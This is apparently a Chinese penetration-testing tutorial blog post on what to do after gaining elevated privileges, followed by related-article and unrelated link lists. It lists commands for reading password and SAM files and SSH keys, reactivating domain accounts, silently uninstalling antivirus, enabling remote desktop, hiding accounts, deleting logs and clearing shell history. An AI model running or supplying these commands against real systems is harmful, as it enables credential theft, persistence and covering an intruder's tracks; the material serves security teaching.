提权后操作

提权之后,要收集目标系统的重要信息
LINUX

/etc/resolv.conf       #查看DNS配置,是否可以进行DNS篡改或劫持

/etc/passwd         #存放账号

/etc/shadow            #存放密码

whoami/who -a       #查看当前用户/查看所有用户

ifconfig -a          #查看ip

iptables -L -n    #防火墙配置

netstat -nr       #查看当前系统网关以及路由设置,地址欺骗

uname -a       #操作系统版本

ps aux          #查看进程

dpkg -l        #列出所有软件包【rc:表示包被删除  ii:安装 】

WINDOWS

ipconfig /all          #查看所有的IP配置

ipconfig /displaydns    #查看当前DNS缓存【可发现系统管理员经常浏览的网页】

netstat -bnao           #

netstat -r                    #产看路由

net view    net view /domain   #查网络共享

net user /domain    net user %username% /domain    #域账号信息

net accounts net share    #查看开的共享服务

net group "Domain Controllers" /domain     #查看Domain Controllers里的主机账号/域控制器

net share name$=C:\ /unlimited     #操作命令:将C盘共享出来

net user username /active:yes /domain     #域环境下,将锁定账号启动【离职员工】

windows平台下命令工具

WMIC(WINDOWS MANAGEMENT INSTRUMENTATION)

wmic nicconfig get ipaddress,macaddress     #查询IP地址/mac地址
 wmic computersystem get username    #当前登陆账号
 wmic netlogin get name,lastlogon     #用户登录记录


 wmic process get caption, executablepath,commandline      #查看当前进程与命令方式
 wmic process where name=“calc.exe" call terminate           #结束一个进程【calc.exe计算器】
 wmic os get name,servicepackmajorversion                     #提取操作系统服务版本
 wmic product get name,version                                         #查看操作系统安装的软件
 wmic product where name=“<name>” call uninstall /nointeractive    #删掉某些软件【如:杀毒软件】#nointeractive 后台静默运行
 wmic share get /ALL                        #查看共享文件夹
 wmic /node:"localhost" path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1“                                     #开启远程桌面
 wmic nteventlog get path,filename, writeable        #查看当前系统日志对应哪些系统文件

eventvwr/eventvwr.msc   # 打开时间查看器

【目的:删除日志/让日志无法记录】

【提权后】

收集敏感数据

商业信息【财务信息、机密信息】

系统信息

Linux下

/etc/、/usr/local/etc【配置文件放置目录】

/etc/passwd、/etc/shadow   #账号密码

.ssh   .gnupg 公私钥  #linux以.为首的目录/文件都是隐藏的

The e-mail and data files     #邮件/数据文件

业务数据库 ;身份认证服务器数据库

/tmp    #linux中的临时目录,存放临时数据【有可能泄露机密数据】

Window

SAM数据库;注册表文件

%SYSTEMROOT%\repair\SAM         #SAM进行修复操作时,保存SAM副本

%SYSTEMROOT%\System32\config\RegBack\SAM     #注册表备份

业务数据库 ; 身份认证数据库
临时文件目录           #病毒经常驻留的地方
UserProfile\AppData\Local\Microsoft\Windows\Temporary Internet Files\

隐藏痕迹

禁止在登陆界面显示新建账号  【windows系统在启动界面会显示所有可登录的账号】

修改注册表:REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon\SpecialAccounts\UserList" /v uname /T REG_DWORD /D 0

【此方法只能在登录界面隐藏】

del %WINDIR%\*.log /a/s/q/f             #静默强制删除日志

Linux

History               #查看曾经运行的命令【保存文件位置:bash_history】

history -c           #删除history记录

chattr +i .bash_history         #修改文件属性为i【i:无法修改】

日志【不同的linux系统,日志文件名称也许不一样】

• auth.log / secure

• btmp / wtmp

• lastlog / faillog

其他日志和 HIDS 等

小白日记26:kali渗透测试之提权(六)--收集敏感信息,隐藏痕迹的更多相关文章

  1. 小白日记21:kali渗透测试之提权(一)--本地提权

    本地提权 简单地说,本地提权漏洞就是说一个本来非常低权限.受限制的用户,可以提升到系统至高无上的权限.权限提升漏洞通常是一种"辅助"性质的漏洞,当黑客已经通过某种手段进入了目标机器 ...

  2. 小白日记24:kali渗透测试之提权(四)--利用漏洞提权

    利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/librar ...

  3. 小白日记25:kali渗透测试之提权(五)--利用配置不当提权

    利用配置不当提权 与漏洞提权相比,更常见的方法.在大部分企业环境下,会有相应的补丁更新策略,因此难以通过相应漏洞进行入侵.当入侵一台服务器后,无法照当相应的补丁进行提权,可通过寻找是否存在配置不当进行 ...

  4. 小白日记23:kali渗透测试之提权(三)--WCE、fgdump、mimikatz

    WCE windows身份认证过程 http://wenku.baidu.com/view/cf2ee127a5e9856a56126017.html #特例在登陆的目标服务器/系统,有一个w摘要安全 ...

  5. 小白日记22:kali渗透测试之提权(二)--抓包嗅探

    抓包嗅探 通过抓包嗅探目标机器的流量,发现账号密码. Windows系统 1.Wirehshark 2.Omnipeek 3.commview 4.Sniffpass 只会抓取识别传输密码的明文协议, ...

  6. Linux提权后获取敏感信息的方法与途径

    在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享(我的出发点).下面是一个混合的命令做同样的事情,在不同的地方,或只是一个不同的眼光来看待事物.我知道 ...

  7. 史上最全Linux提权后获取敏感信息方法

    http://www.freebuf.com/articles/system/23993.html 在本文开始之前,我想指出我不是专家.据我所知,在这个庞大的区域,没有一个“神奇”的答案.分享,共享( ...

  8. LINUX提权后获取敏感信息之方法

    文中的每行为一条命令,文中有的命令可能在你的主机上敲不出来,因为它可能是在其他版本的linux中所使用的命令. 列举关键点 (Linux)的提权是怎么一回事:  收集 – 枚举,枚举和一些更多的枚举. ...

  9. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

随机推荐

  1. bzoj 3732 Network(最短路+倍增 | LCT)

    [题目链接] http://www.lydsy.com/JudgeOnline/problem.php?id=3732 [题意] 给定一个无向图,处理若干询问:uv路径上最长的边最小是多少? [思路一 ...

  2. 在Toast里面显示图片

        关于怎么在Toast里面显示图片,首先自定义一个toast,在自定义一个布局,这个布局你想让toast显示什么样的布局就定义什么样的,然后在自定的布局中放一个ImageView,在把自己自定义 ...

  3. Tkinter教程之Listbox篇

    本文转载自:http://blog.csdn.net/jcodeer/article/details/1811310 #Tkinter教程之Listbox篇#Listbox为列表框控件,它可以包含一个 ...

  4. 使用MATLAB生成模糊控制的离线查询表

    1.打开模糊控制工具箱,编辑输入输出变量的隶属度函数和模糊控制规则,如下图所示,导出为fuzzy_control.fis文件. 2.打开Simulink模块,建立下图所示的系统框图,两输入,一输出,处 ...

  5. 依赖包bcrypt安装Issues

    说明:本文在个人博客地址为edwardesire.com,欢迎前来品尝. 在决策树项目中,使用到了bcrypt依赖包来加密文件.在wini8(win7)部署安装这个依赖的时候容易出现出现了问题. 解决 ...

  6. JS代码格式化修改表格的数值的格式

    今天在cognos中第一次需要用到JS,主要是报表页面展示的时候是可能得到如下的数据 ,我需要对其中类型中有金额字样的,后面的数值,精确2位小数:有百分比字样的,数值显示成百分比.如下. 我先尝试了自 ...

  7. POJ 2253 Frogger (dijkstra 最大边最小)

    Til the Cows Come Home 题目链接: http://acm.hust.edu.cn/vjudge/contest/66569#problem/A Description The i ...

  8. Test Spring el with ExpressionParser

    Spring expression language (SpEL) supports many functionality, and you can test those expression fea ...

  9. [iOS微博项目 - 1.4] - 各种item NavigationBar & NavigationItem & BarButtonItem || TabBar & TabBarItem

    一.UINavigationItem1> 获得方式self.navigationItem // self是指控制器2> 作用可以用来设置当前控制器顶部导航栏的内容// 设置导航栏中间的内容 ...

  10. HDU 3577 Fast Arrangement (线段树区间更新)

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=3577 题意不好理解,给你数字k表示这里车最多同时坐k个人,然后有q个询问,每个询问是每个人的上车和下车 ...